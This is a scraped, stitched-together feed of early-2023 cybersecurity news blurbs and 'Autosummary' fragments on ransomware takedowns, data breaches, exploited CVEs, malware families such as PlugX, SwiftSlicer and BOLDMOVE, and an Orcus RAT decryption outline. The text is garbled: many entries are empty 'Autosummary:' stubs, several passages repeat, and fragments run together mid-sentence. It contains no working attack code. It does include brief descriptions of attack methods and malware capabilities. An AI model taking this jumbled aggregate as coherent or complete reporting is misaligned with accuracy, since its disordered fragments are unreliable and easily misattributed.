How to decrypt data: generate the key from a given string using Microsoft"s PBKDF1 implementation decode the data from Base64 apply the generated key to decrypt the data via the AES256 algorithm in CBC mode. Today we investigate the .NET sample that you can download for free in ANY.RUN database: SHA-256: 258a75a4dee6287ea6d15ad7b50b35ac478c156f0d8ebfc978c6bbbbc4d441e1 1 — Get to know Orcus classes You should start with checking malware classes where you can get the hidden program"s characteristics. Get all at once in a malware sandbox Malware analysis is not a piece of cake, it definitely takes time and effort to crack a sample. "Autosummary:
"The attacks are not aimed at the general public but targets in specified sectors, including academia, defense, government organizations, NGOs, think tanks, as well as politicians, journalists and activists," the NCSC said. "Autosummary:
"Autosummary:
Comparison between clean and infected USB drives (Unit 42) During their research, the Unit 42 team has also discovered a document-stealing variant of the PlugX malware that targets USB drives, too, but has the added capability of copying PDF and Microsoft Word documents onto a folder in the hidden directory called da520e5. "Autosummary:
"Sandworm continues to conduct attacks against carefully chosen targets in the war-torn country
The post SwiftSlicer: New destructive wiper malware strikes Ukraine appeared first on WeLiveSecurity
"Autosummary:
When it comes to SwiftSlicer’s method of destruction, ESET researchers had this to say: “Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\Windows\NTDS and other non-system drives and then reboots computer. "Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Maria Varmazis – @mvarmazis Episode links: Sponsored by: Bitwarden – Bitwarden vaults are end-to-end encrypted with zero-knowledge encryption, including, the URLs for the websites you have accounts for. "Autosummary:
"Open-source software enables better security for both large and small organizations. It is the foundation of today’s society and is found throughout a modern application stack, from the operating system to networking functions. It’s estimated that around 90% of organizations use open source in some way, according to GitHub’s 2022 Octoverse report. Open-source software can be examined by everyone, both attackers and defenders. But this does not necessarily give attackers the upper hand. Rather, it … More
The post How businesses can bolster their cybersecurity defenses with open source appeared first on Help Net Security.
"Autosummary:
The development of open-source security This year has seen moves by governments and Big Tech companies to ensure the security of open-source software, with the OpenSSF (Open Source Security Foundation) announcing initiatives to improve the security of open source software, including a $30 million fund with a 10-point plan to boost the security of open source software. Alongside open source, businesses should adopt further best practice measures for secure software, such as code reviews, scanning for vulnerabilities, visibility into the system and knowing the attack surface – just a few ways that code, packages, and systems can be evaluated for security. "A language-generating AI model called ChatGPT, available for free, has taken the internet by storm. While AI has the potential to help IT and security teams become more efficient, it also enables threat actors to develop malware. In this interview with Help Net Security, Daniel Spicer, Chief Security Officer for Ivanti, talks about what this technology means for cybersecurity. What are some reasons for concern regarding the application of AI to cybersecurity? The tech industry … More
The post ChatGPT is a bigger threat to cybersecurity than most realize appeared first on Help Net Security.
"Autosummary:
Currently, the value of generative AI, like ChatGPT and DALL-E, is lopsided in favor of threat actors. In this interview with Help Net Security, Daniel Spicer, Chief Security Officer for Ivanti, talks about what this technology means for cybersecurity. On the flip side, AI has the potential to help IT and security teams become more efficient and effective, enabling automated and/or semi-automated vulnerability detection and remediation as well as risk-based prioritization. That’s alarming, because it expands not only the volume of potential threats and number of potential threat actors, but also makes it more likely that people who have little to no idea what they’re doing will be out there joining the fray. "The first half of 2022 saw fewer compromises reported due in part to Russia-based cybercriminals distracted by the war in Ukraine and volatility in the cryptocurrency markets, according to the Identity Theft Resource Center. However, data compromises steadily increased in the second half of 2022. The number of victims impacted (422.1 million) increased by 41.5% from 2021. For 11 of the 12 months in 2022, the estimated number of data compromise victims was trending downward … More
The post Supply chain attacks caused more data compromises than malware appeared first on Help Net Security.
"Autosummary:
Other findings Data breach notices suddenly lacked details, resulting in increased risk for individuals and businesses, as well as uncertainty about the number of data breaches and victims. "With continued transition to cloud services to support remote work, the threat of malware continues to grow, expanding each company’s attack surface. The first half of 2022 saw 2.8 billion malware attacks in which more than 270,000 “never-seen-before” malware variants were used, according to Sonicware’s mid-year report, up 45% from last year. Perimeter 81 added malware protection to strengthen its security offering and better protect its customers from internet-borne risks. Perimeter 81’s malware protection requires … More
The post Perimeter 81’s malware protection defends users from internet-borne threats appeared first on Help Net Security.
"Autosummary:
Clients can use malware protection to secure their users from any internet-based threat like viruses, trojans, worms, rootkits, keyloggers, phishing, adware, spyware, and advanced persistent threats that can damage the organization via ransomware, extortion, data breaches, and more. "Malwarebytes has announced the upcoming Malwarebytes Mobile Security for Business, extending its endpoint protection capabilities to professional mobile devices. From corporate organizations to educational institutions, the increasing number of connected mobile devices introduces security risks to users and networks. With 25% of mobile apps containing at least one high-risk security flaw, IT administrators are facing a rapidly growing security threat as mobile device usage increases in academic and business environments. Traditionally, organizations have focused endpoint … More
The post Malwarebytes Mobile Security for Business protects organizations’ mobile devices appeared first on Help Net Security.
"Autosummary:
"Experts warn of a spike in the attacks that between August and October 2022 attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394). Palo Alto Networks researchers reported that between August and October 2022 the number of attacks that attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394) (CVSS score 9.8) accounted for more than […]
The post Experts warn of a surge of attacks exploiting a Realtek Jungle SDK RCE (CVE-2021-35394) appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, CVE-2021-35394) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
“The attacks are not aimed at the general public but targets in specified sectors, including academia, defense, government organizations, NGOs, think tanks, as well as politicians, journalists, and activists” - U.K. NCSC SEABORGIUM, also known as ‘TA446,’ is a Russian state-sponsored threat group that targeted NATO countries last summer. "Autosummary:
The ransomware gang"s Tor web sites now display a seizure notice listing a a wide range of other countries involved in the law enforcement operation, including Germany, Canda, France, Lithuania, Netherlands, Norway, Portugal, Romania, Spain, Sweden, and the United Kingdom. "Autosummary:
"Autosummary:
Image A 22-year-old suspected of being "Seyzo", a member of the ShinyHunters cybercrime gang, has been extradited from Morocco to the United States, where - if convicted - he could face up to 116 years in prison. "Europol supported the German, Dutch and US authorities in taking down the infrastructure of the prolific HIVE ransomware. This international operation involved authorities from 13 countries in total. Law enforcement identified the decryption keys and shared them with many victims, helping them regain access to their data without paying the cybercriminals. In the last year, HIVE ransomware has been identified as a major threat as it has been used to compromise and encrypt the data … More
The post Authorities shut down HIVE ransomware infrastructure, provide decryption tools appeared first on Help Net Security.
"Autosummary:
Since June 2021, criminals have used HIVE ransomware to target many businesses and critical infrastructure sectors, including government facilities, telecommunication companies, manufacturing, information technology, and healthcare and public health.Europol also provided analytical support linking available data to various criminal cases within and outside the EU, and supported the investigation through cryptocurrency, malware, decryption and forensic analysis. "Akamai researchers have published a PoC exploit for a critical vulnerability (CVE-2022-34689) in Windows CryptoAPI, which validates public key certificates. “An attacker could manipulate an existing public x.509 certificate to spoof their identity and perform actions such as authentication or code signing as the targeted certificate,” Microsoft said in October 2022, when they announced fixes for vulnerable Windows and Windows Server versions. The vulnerability was actually patched in August 2022, but its existence only revealed … More
The post Researchers release PoC exploit for critical Windows CryptoAPI bug (CVE-2022-34689) appeared first on Help Net Security.
"Autosummary:
CVE-2022-34689 exploitation To exploit CVE-2022-34689, the first certificate, which is generated in a way that facilitates a chosen prefix collision attack and is correctly signed and verified, needs to be cached by the CryptoAPI, so that the second certificate (with the same MD5 thumbprint as the previous one) can be promptly trusted because Microsoft does not re-check cached certificates. "Autosummary:
"Autosummary:
"The leak site of the Hive ransomware gang was seized due to an international operation conducted by law enforcement in ten countries. The Tor leak site used by Hive ransomware operators has been seized as part of an international operation conducted by law enforcement in 10 countries. “The Federal Bureau of Investigation seized this site […]
The post Hive Ransomware Tor leak site apparently seized by law enforcement appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, ransomware) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The domain used in the ad was "appbitwarden.com" and, when clicked, redirected users to the site "bitwardenlogin.com." Bitwarden phishing site promoted via a Google ad Source: Reddit The page at "bitwardenlogin.com" was an exact replica of the legitimate Bitwarden Web Vault login page, as seen below. Bitwarden phishing page Source: BleepingComputer In our tests, the phishing page will accept credentials and, once submitted, redirect users to the legitimate Bitwarden login page. "Autosummary:
"For information on the identification or location of any person who, while acting at the direction of a foreign government, participates in malicious cyber activities against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act." "Send us your information on Signal, Telegram, WatshApp, or via our Tor-based tip line. "Autosummary:
"Autosummary:
To do that, head to “Settings → Network/Ports → TCP/IP → TCP/IP Port Access,” uncheck “TCP 65002 (WSD Print Service),” and save the changes. "The U.K. National Cyber Security Centre (NCSC) warns of a surge in the number of attacks from Russian and Iranian nation-state actors. The U.K. National Cyber Security Centre (NCSC) is warning of targeted phishing attacks conducted by threat actors based in Russia and Iran. The are increasingly targeting organizations and individuals. The UK agency reported ongoing spear-phishing […]
The post UK NCSC warns of spear-phishing attacks from Russia-linked and Iran-linked groups appeared first on Security Affairs.
"Autosummary:
More details + TTPs in this MSTIC blog: https://t.co/nVoF8GxrFQ — Microsoft Security Intelligence (@MsftSecIntel) August 15, 2022 Below are the recommendations provided by the agency in the advisory: Use strong and separate passwords for your email account Turn on multi-factor authentication (also known as 2-step verification, or 2SV) Protect your devices and networks by keeping them up to date Exercise vigilance Enable your email providers’ automated email scanning features Disable mail-forwarding Follow me on Twitter: @securityaffairs and Facebook and Mastodon [adrotate banner=”9″] "Categories: Business In this article, we’ll arm you with five facts about Vice Society so you can get the upper-hand against this persistent education sector threat. |
The post 5 facts about Vice Society, the ransomware group wreaking havoc on the education sector appeared first on Malwarebytes Labs.
"Autosummary:
In 2022 they were far and away the biggest attackers on the education sector If you’re a regular reader of our monthly ransomware review, you know that the education sector has gotten plenty of attention from ransomware gangs in the last year, to say the least. We don’t want to say launching ransomware on K-12 schools, colleges, and universities is as easy as taking candy from a baby, but unfortunately that’s how many RaaS gangs see it. A few of the institutions published on their leak site last year include De Montfort School, Cincinnati State, and one that made national headlines in September: Los Angeles Unified, the second largest school district in the US. "Autosummary:
"Autosummary:
"The cybersecurity skills shortage is a global problem, but each region – including Europe or, more specifically, the EU – has distinct problems it has to tackle to solve it. In this Help Net Security Dritan Saliovski, Director – Nordic Head of Cyber M&A, Transaction Advisory Services at Aon, offers some pointers, as well as advice to organizations on how to attract and retain the best cybersecurity talent. The cybersecurity skills shortage is still a … More
The post How to tackle the cybersecurity skills shortage in the EU appeared first on Help Net Security.
"Autosummary:
Studies and surveys, such as Glassdoor, Deloitte and Gallup, have found that a positive work-life balance, opportunities for growth and development, a positive company culture, and a clear mission and values that align with the employee’s personal values are important factors in attracting and retaining top talent. In conclusion, addressing the cybersecurity skills shortage requires a multi-pronged approach that includes targeted training and education programs, incentives to attract and retain talent, building a diverse and inclusive workforce, investing in new technologies, and opening the door for entry-level candidates. To mitigate this issue, organizations must take a multi-pronged approach, including targeted training and education programs, incentives to attract and retain talent in the cybersecurity field, building a diverse and inclusive workforce, and investing in technologies that automate certain tasks. Another effective approach is the training programs provided by the big four consulting firms, such as Deloitte, EY, KPMG, and PwC. These firms are known for their rigorous and comprehensive training programs, which provide opportunities for entry-level candidates to join the firm through internships and entry-level positions. Additionally, organizations can open the door to entry-level candidates by creating and promoting internship, apprenticeship, and entry-level positions, which provide opportunities for individuals to gain the necessary skills and experience to advance in the cybersecurity field. Aiming for 7-8 hours of sleep Regular physical activity Building and maintaining positive relationships Setting aside time each day to do something you enjoy Meditate Self-reflect Internalize your day As a leader, I understand the importance of addressing stress and burnout in the cybersecurity industry.This should include standardizing cybersecurity education and certification across the EU, encouraging more individuals to enter the cybersecurity field, consider tax reform, security clearance, and investing in training and development programs to help individuals acquire these skills. "Autosummary:
"The hackers who breached Riot Games last week are asking for $10 million not to leak the stolen source code for the company’s popular League of Legends online game. The company has also confirmed that source code for TFT (Teamfight Tactics) and a legacy anti-cheat platform (Packman) were exfiltrated by the attackers, but said they won’t be paying the ransom. It all started with social engineering Last week, Riot Games said that systems in their … More
The post Riot Games breached: How did it happen? appeared first on Help Net Security.
"Autosummary:
The operator of malware repository vx-underground has professedly spoken to the attacker, who said they got in by social engineering a Riot Games employee via SMS, that they managed to pivot through the company network and escalate privileges by social engineering a company director, but that they did not deploy malware (e.g., ransomware) on company systems. "Autosummary:
"Autosummary:
Execute shell commands Perform host enumeration Extract passwords and cookies from web browsers Steal data from the clipboard Detect anti-virus tools running on the host Stealing data from Chrome, Brave, Opera, and Edge browsers (Securonix) Securonix researchers say that the malware "leverages Python"s built-in Socket. "Autosummary:
"Autosummary:
"Autosummary:
Vietnam, Russia, The Netherlands, France, Luxembourg, and Germany were also found to be in the top seven countries from which we observed threat actors taking part in these attacks” - Palo Alto Networks Unit 42 Realtek SDK flaw details CVE-2021-35394 is a critical (CVSS v3: 9.8) vulnerability in Realtek Jungle SDK version 2.x to 3.4.14B, caused by multiple memory corruption flaws that allow remote unauthenticated attackers to perform arbitrary command injection. "Autosummary:
Should an attack using a CVE-2022-34689 exploit be successful, it could also provide attackers with the ability to perform man-in-the-middle attacks and decrypt confidential information on user connections to the affected software, such as web browsers that use Windows" CryptoAPI cryptography library. "Autosummary:
Vietnam, Russia, The Netherlands, France, Luxembourg, and Germany were also found to be in the top seven countries from which we observed threat actors taking part in these attacks” - Palo Alto Networks Unit 42 Realtek SDK flaw details CVE-2021-35394 is a critical (CVSS v3: 9.8) vulnerability in Realtek Jungle SDK version 2.x to 3.4.14B, caused by multiple memory corruption flaws that allow remote unauthenticated attackers to perform arbitrary command injection. "Categories: News Tags: GTAV Tags: grand theft auto 5 Tags: game Tags: gaming Tags: rockstar Tags: exploit Tags: corruption Tags: profile Tags: data We take a look at reports of players having their GTAV data corrupted by exploiters. |
The post Grand Theft Auto 5 exploit allows cheaters to tamper with your data appeared first on Malwarebytes Labs.
"Autosummary:
One thing to note where corrupted data messages are concerned: if you’re a modder, and you see a corrupted profile message, it may not be a compromise. "Zacks Investment Research (Zacks) disclosed a data breach, the security may have exposed the data of 820K customers. Zacks Investment Research (Zacks) disclosed a data breach, the security incident may have affected the personal information of its 820,000 customers. “On December 28, 2022, Zacks learned that an unknown third-party had gained unauthorized access to certain […]
The post Zacks Investment Research data breach impacted hundreds of thousands of customers appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, data breach) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"One of the big surprises in Russia’s war against Ukraine has been how well Ukraine has fended off Russian cyberattacks. Ad hoc groups of white-hat hackers have helped, as have a number of nations and the US government.
Less well known is that tech companies, including Microsoft, are part of the effort. That aid ranges from giving advice to identifying attacks, offering fixes for them, and providing Ukraine with free tech and security services.
Microsoft isn’t just trying to help defend a country under siege from an aggressive, more-powerful neighbor. Russian cyberattacks against Ukraine can also get loose in the wild and do damage to enterprises and organizations that rely on Microsoft technology. (Russia could also deliberately target private companies with those attacks.)
Autosummary:
The day before the ground invasion began, Russia’s military intelligence service, the GRU, “launched destructive wiper attacks on hundreds of systems in Ukrainian government, IT, energy, and financial organizations,” according to Microsoft. Microsoft’s Tom Burt, corporate vice president for customer security and trust, said in a blog post last year that Microsoft’s Threat Intelligence Center (MSTIC) found wiper malware in more than a dozen Ukrainian networks, alerted the Ukrainian government to it, and opened a 24/7 cybersecurity hotline to help fight it. Microsoft offered a week-by-week account of Russia’s cyberattacks and listed some of the most dangerous pieces of malware being used, many of which target networks, Windows PCs, and .NET, Microsoft’s open source developer platform. "Apple has released security updates for macOS, iOS, iPadOS and watchOS, patching – among other things – a type confusion flaw in the WebKit component (CVE-2022-42856) that could be exploited for remote code execution on older iPhones and iPads running iOS v12. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.1,” the company said. CVE-2022-42856 was a zero-day vulnerability flagged by Clément … More
The post Apple delivers belated zero-day patch for iOS v12 (CVE-2022-42856) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"US CISA added the Zoho ManageEngine RCE vulnerability CVE-2022-47966 to its Known Exploited Vulnerabilities Catalog. The US CISA added the Zoho ManageEngine remote code execution flaw (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The […]
The post CISA added Zoho ManageEngine RCE (CVE-2022-47966) to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, CISA) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Lapsus$ is known for hacking into the network of a series of high-profile companies, including Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "Autosummary:
"Autosummary:
In this Google ads campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and, strangely, websites for W-9 IRS forms. These ads pretend to be websites for popular software programs, like LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC. "Autosummary:
"Categories: Apple Categories: Exploits and vulnerabilities Categories: News Tags: iOS 12.5.7 Tags: CVE-2022-42856 Tags: type confusion Tags: WebKit Apple has now released security content for iOS 12.5.7 which includes a patch for an actively exploited vulnerability in WebKit and many other updates. |
The post Own an older iPhone? Check you"re on the latest version to avoid this bug appeared first on Malwarebytes Labs.
"Autosummary:
Affected devices The patch is available for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). "Categories: News Tags: Riot Games Tags: valorant Tags: league of legends Tags: compromise Tags: development Tags: patch Tags: patching Tags: update Riot Games has revealed that it has been compromised after a social engineering attack. |
The post Riot Games compromised, new releases and patches halted appeared first on Malwarebytes Labs.
"Autosummary:
For now Riot, stewards of titles such as Valorant and League of Legends, made the following statement in relation to the attack: Earlier this week, systems in our development environment were compromised via a social engineering attack. "A critical vulnerability in VMware vRealize Log Insight appliance can allow an unauthenticated attacker to take full control of a target system. VMware addressed multiple vulnerabilities, tracked as CVE-2022-31706, CVE-2022-31704, CVE-2022-31710, and CVE-2022-31711, in its vRealize Log Insight appliance. VRealize Log Insight is a log collection and analytics virtual appliance that enables administrators to collect, view, […]
The post VMware warns of critical code execution bugs in vRealize Log Insight appeared first on Security Affairs.
"Autosummary:
"IoT remains the biggest hurdle in achieving an effective zero-trust security posture across an organization. In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT.
The post Why most IoT cybersecurity strategies give zero hope for zero trust appeared first on Help Net Security.
"Autosummary:
"Linor spends her days working with cybersecurity founders at her Venture Capital firm. Gaining insight into their experiences over the course of building these relationships and supporting the brick-laying of their visions, she shares observations on the tough – and often undiscussed –impact their startup journey has on emotional wellness and self-care. The world of well-invested startups is a glamorous beacon to highly motivated entrepreneurs across the cybersecurity industry, and the ultimate responsibility for reaching … More
The post The loneliness of leading a cybersecurity startup appeared first on Help Net Security.
"Autosummary:
When building something unprecedented and game-changing, the course and rules are steeped in darkness and uncertainty, with naysayers, critics, board members, competitors and time itself hurling criticisms every step of the way.Mentors are most likely to appreciate the toll leadership can take on the overall health of founders, who, under so much stress, often sacrifice things like eating well, sleeping well, family time and investing in personal growth. As investors who generate in-house services and accelerate growth for these founders, we do, at the very least, offer hands-on support and guidance across different company-building responsibilities. However, this determination alone is hardly enough to contend with the true reality of executive leadership; as VP of HR with the opportunity to frequently meet the Israeli tech sector’s best and brightest, I’ve come to appreciate how emotional resilience is no less important than passion, technical knowhow or business acumen. "Video game developer and publisher Riot Games announced that it will delay the release of game patches after a security incident. Riot Games is an American video game developer, publisher and esports tournament organizer known for the creation of the popular games League of Legends and Valorant. Last week threat actors hacked the company’s systems in its development environment, Riot Games […]
The post Video game firm Riot Games hacked, now it faces problems to release content appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, gaming) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Which is why FanDuel has found itself in the embarrassing position of contacting customers who were exposed by the breach, and warning them that even though passwords, financial information, and the like were not exposed… names and email addresses are now in the hands of cybercriminals. "Autosummary:
AVOID GTAO ON PC RIGHT NOW#GTAOnline pic.twitter.com/1SqGmz38Jw — floorball (@Fluuffball) January 21, 2023 A Twitter user, Tez2, who closely follows Rockstar Games, stated that users should avoid playing the game without a firewall rule, or better, not play it at all. "Autosummary:
Excel XLL warning (BleepingComputer) As Cisco Talos said in a January report, XLLs are now used by both financially-motivated attackers and state-backed threat groups (APT10, FIN7, Donot, TA410) as an infection vector to deliver first-stage payloads onto their targets" devices. "The recent Mailchimp data breach has impacted multiple organizations, some of them are already notifying their customers. The popular email marketing and newsletter platform Mailchimp recently disclosed a news data breach, the incident exposed the data of 133 customers. Threat actors targeted the company’s employees and contractors to gain access to an internal support and […]
The post Companies impacted by Mailchimp data breach warn their customers appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, data breach) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “In a note to customers, WooCommerce said it was notified by Mailchimp a day later that the breach may have exposed the names, store web addresses and email addresses of its customers, though it said no customer passwords or other sensitive data was taken.” "Autosummary:
"Autosummary:
Make sure to update to fixed versions as specified in the ManageEngine advisoryhttps://t.co/BIRlXnHkAT — Shadowserver (@Shadowserver) January 19, 2023 All orgs urged to prioritize patching All Federal Civilian Executive Branch Agencies (FCEB) agencies must patch their systems against this actively exploited bug after it was added to CISA"s Known Exploited Vulnerabilities (KEV) catalog, according to a binding operational directive (BOD 22-01) issued in November 2021. "Autosummary:
And yet, despite the safeguards and regulations, the lives of thousands of people have been endangered after US Immigration and Customs Enforcement (ICE), a branch of the DHS, carelessly published their personal details on its website. "Categories: News Categories: Ransomware Tags: ransomware Tags: revenue Tags: attacks Tags: negotiators Tags: back-ups Tags: restore Tags: Continental According to blockchain data platform Chainanalysis, ransomware revenue plummeted significantly in 2022 due to a growing unwillingness to pay. |
The post Ransomware revenue significantly down over 2022 appeared first on Malwarebytes Labs.
"Autosummary:
Image courtesy of Chainalysis Payments, not attacks This decline could be explained in a number of ways: Fewer attacks Lower ransom demands or demand being negotiated down Fewer victims willing to pay According to our own research and Chainalysis, the declining numbers are mainly due to victim organizations increasingly refusing to pay ransomware attackers. "Apple has backported the security updates for the zero-day vulnerability CVE-2022-42856 to older iPhones and iPads. On December 2022, Apple released security updates to address a new zero-day vulnerability, tracked as CVE-2022-42856, that is actively exploited in attacks against iPhones. The IT giant released security bulletins for iOS/iPadOS 15.7.2, Safari 16.2, tvOS 16.2, and macOS Ventura 13.1. Apple addressed […]
The post Apple backported patches for CVE-2022-42856 zero-day on older iPhones, iPads appeared first on Security Affairs.
"Autosummary:
On December 14, 2022, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities Catalog and ordered federal agencies to address it by January 04, 2022 The company addressed the zero-day bug with improved state handling for the following devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). "Categories: Business We asked 250 schools and hospitals about their mobile security posture, including Chromebooks. Here’s what we found out. |
The post Key takeaways from Malwarebytes 2023 State of Mobile Cybersecurity appeared first on Malwarebytes Labs.
"Autosummary:
"Roaming Mantis threat actors were observed using a new variant of their mobile malware Wroba to hijack DNS settings of Wi-Fi routers. Researchers from Kaspersky observed Roaming Mantis threat actors using an updated variant of their mobile malware Wroba to compromise Wi-Fi routers and hijack DNS settings. Roaming Mantis surfaced in March 2018 when hacked routers in Japan to […]
The post Roaming Mantis uses new DNS changer in its Wroba mobile malware appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, Roaming Mantis) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" FanDuel also stressed that this was not a breach of their systems or FanDuel user accounts and that the hackers did not acquire "passwords, financial account information, or other personal information" during the breach. "Autosummary:
" FanDuel also stressed that this was not a breach of their systems or FanDuel user accounts and that the hackers did not acquire "passwords, financial account information, or other personal information" during the breach. "Autosummary:
"Autosummary:
"Autosummary:
" "This issue may impact our ability to release the full scope of balance changes planned, but we"re working to implement the most meaningful of those possible through a hotfix at our scheduled patch time," the TFT team added. "Autosummary:
Protecting against these threats Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams. From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents. "Autosummary:
"Autosummary:
Protecting against these threats Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams. From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents. "Autosummary:
"Autosummary:
"An alleged Chinese threat actor was observed exploiting the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN. Researchers from Mandiant reported that suspected Chinese threat actors exploited the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN as a zero-day. According to the security firm, the vulnerability was exploited in attacks against a series of targets, including a […]
The post Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October appeared first on Security Affairs.
"Autosummary:
[adrotate banner=”12″] Pierluigi Paganini (SecurityAffairs – hacking, FortiOS SSL-VPN) [adrotate banner=”5″] [adrotate banner=”13″] Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Through our ongoing investigation, we determined that between July 31, 2022, and September 3, 2022, an unauthorized actor accessed and acquired certain files maintained on our servers," the school district said in data breach notification letters sent to affected individuals. "Autosummary:
The new BOLDMOVE malware BOLDMOVE is a full-featured backdoor written in C that enables Chinese hackers to gain higher-level control over the device, with the Linux version specifically created to run on FortiOS devices. "Autosummary:
What has not yet been made public, and may not even be known to those investigating the breach, is how long hackers might have had access to the company"s IT infrastructure, and how they might have been able to gain access to what should have been a secure system. "Autosummary:
"Autosummary:
" Gamaredon, also known by names such as Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, is known for its assaults against Ukrainian entities since at least 2013. "PayPal is sending out data breach notifications to thousands of users because their accounts were compromised through credential stuffing attacks. PayPal announced that 34942 customers’ accounts have been compromised between December 6 and December 8. The company added that the unauthorized accessed were the result of credential stuffing attacks and that its systems were not […]
The post PayPal notifies 34942 users of data breach over credential stuffing attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, credential stuffing) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Depending on the attacker’s motives, the attack may lead to app UI interaction, access to sensitive information, or crashing apps. "Autosummary:
IPs linked to CVE-2022-47966 exploitation (GreyNoise) Post-exploitation activity on compromised devices While investigating attacks that led to the compromise of some of its customers" ManageEngine instances, Rapid7 also observed post-exploitation activity. "Autosummary:
"Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @demonslay335, @malwrhunterteam, @Seifreed, @billtoulas, @PolarToffee, @struppigel, @serghei, @fwosar, @BleepinComputer, @Ionut_Ilascu, @chainalysis, @coveware, @BrettCallow, @jgreigj, @pcrisk, @Avast, and @Jon__DiMaggio.Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom. "Categories: News Categories: Ransomware Tags: Cryptocurrency exchange Tags: Bitzlato Tags: Conti Tags: ransomware Tags: Hydra Tags: dark web marketplace The China-based cryptocurrency exchange Bitzlato is accused of processing over $700 million of illicit funds. |
The post Ransomware money laundering operation disrupted, founder arrested appeared first on Malwarebytes Labs.
"Autosummary:
As stated by Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division: As alleged, the defendant helped operate a cryptocurrency exchange that failed to implement required anti-money laundering safeguards and enabled criminals to profit from their wrongdoing, including ransomware and drug trafficking. "Bad news for T-Mobile, the company disclosed a new data breach that resulted in the theft of data belonging to 37 customer accounts. T-Mobile suffered a new data breach, threat actor stole the personal information of 37 million current postpaid and prepaid customer accounts. The telecommunications company discovered the intrusion on January 5, 2023, the attackers obtained […]
The post T-Mobile suffered a new data breach, 37 million accounts have been compromised appeared first on Security Affairs.
"Autosummary:
“Rather, the impacted API is only able to provide a limited set of customer account data, including name, billing address, email, phone number, date of birth, T-Mobile account number and information such as the number of lines on the account and plan features.” "Ransomware revenue plunges to $456 million in 2022 as more victims refuse to pay up. Here"s what to make of the trend.
The post Ransomware payments down 40% in 2022 – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Abacus Group acquired two boutique cybersecurity consulting companies, Gotham Security and its parent company, GoVanguard, both of which have unparalleled track records of excellence in the cyber arena. Gotham Security, as the new business will be known, will be a subsidiary of Abacus Group but continue to operate independently. The acquisition marks a milestone in Abacus Group’s expansion from a security-focussed managed service provider (MSP) to a full-bodied managed security service provider (MSSP) with an … More
